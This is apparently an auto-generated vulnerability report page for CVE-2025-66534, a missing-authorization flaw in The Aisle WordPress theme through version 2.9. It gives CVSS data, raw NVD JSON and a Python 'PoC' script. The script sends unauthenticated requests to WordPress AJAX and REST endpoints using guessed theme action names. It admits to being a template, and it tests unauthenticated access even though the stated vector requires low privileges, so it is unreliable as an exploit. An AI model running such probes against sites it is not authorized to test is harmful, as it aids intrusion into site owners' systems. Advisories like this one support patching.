Security Vulnerability Report
中文
CVE-2025-66534 CVSS 4.3 MEDIUM

CVE-2025-66534

Published: 2025-12-09 16:18:21
Last Modified: 2026-04-27 18:16:39

Description

Missing Authorization vulnerability in Elated-Themes The Aisle theaisle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Aisle: from n/a through <= 2.9.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

The Aisle Theme <= 2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66534 PoC - The Aisle Theme Broken Access Control # Affected: The Aisle WordPress Theme <= 2.9 import requests import sys target_url = input("Enter target URL: ").rstrip('/') # Common AJAX endpoints in WordPress themes endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/', '/?rest_route=/', ] # Actions that might be vulnerable test_actions = [ 'theaisle_save_settings', 'theaisle_get_bookings', 'theaisle_export_data', 'theaisle_update_options', ] def check_vulnerability(url): print(f"[*] Testing {url} for CVE-2025-66534...") # Test unauthenticated access for endpoint in endpoints: for action in test_actions: try: data = {'action': action} resp = requests.post(url + endpoint, data=data, timeout=10) # Check for successful response without auth if resp.status_code == 200: if 'error' not in resp.text.lower() and 'unauthorized' not in resp.text.lower(): print(f"[!] Potential vulnerability found: {endpoint} with action {action}") print(f"[!] Response preview: {resp.text[:200]}") except Exception as e: continue print("[*] Scan complete. Manual verification recommended.") if __name__ == "__main__": check_vulnerability(target_url) # Note: This is a template PoC. Actual exploitation requires # identifying the specific vulnerable endpoint through # source code analysis or traffic observation.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66534", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:20.960", "lastModified": "2026-04-27T18:16:38.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Elated-Themes The Aisle theaisle allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Aisle: from n/a through <= 2.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/theaisle/vulnerability/wordpress-the-aisle-theme-2-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}